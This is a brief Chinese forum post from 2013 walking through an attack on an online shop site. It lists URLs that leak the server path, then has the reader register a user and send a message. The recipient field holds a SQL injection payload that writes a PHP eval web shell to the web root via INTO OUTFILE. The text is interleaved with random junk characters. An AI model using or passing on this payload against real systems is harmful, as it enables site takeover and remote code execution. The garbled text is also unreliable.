第一个:想办法找到目标网站的绝对路径
# B" W( b9 u B. K' N! e# Q0 h5 [. e+ f# J9 `+ g1 t# t$ l
http://www.political-security.com/install/svinfo.php?phpinfo=true
6 @5 z8 q4 _* L, I$ y/ D9 z; N+ O8 m# z8 x4 H4 F- @
http:/www.political-security.com/core/api/shop_api.php9 _" T( R$ g/ m
; E. S+ Y9 R0 uhttp://www.political-security.co ... api_b2b_2_0_cat.php3 T2 O0 S1 n- c3 i0 f
1 ^* I9 M/ E# h a
http://www.political-security.com/core/ap ... b_2_0_goodstype.php/ b: G t, M8 n, ?$ ]& x+ j- x
+ C/ S6 ^% Y( k/ x* f
http://www.political-security.co ... i_b2b_2_0_brand.php X6 K4 a0 b# @: E4 ^ `; k
第二个:注册一个普通用户( E- l$ x3 u! ~ x" R, Q; N
y! P" p) S5 W% U" _http://www.political-security.com/?passport-signup.html
, e4 S6 H1 ]4 N$ f4 b7 S
" I9 {2 h t. U. B第三个: 发送消息 % g: a; N/ H) N1 N/ n
, ]( B, A$ \" _/ e( phttp://www.political-security.com/?member-send.html
( W( J+ B. h6 {( ?发送给中填写1 _0 P6 w V4 o$ r1 s1 ]' { ?, a
antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |
发表于 2013-2-27 21:28:28
收藏
支持
反对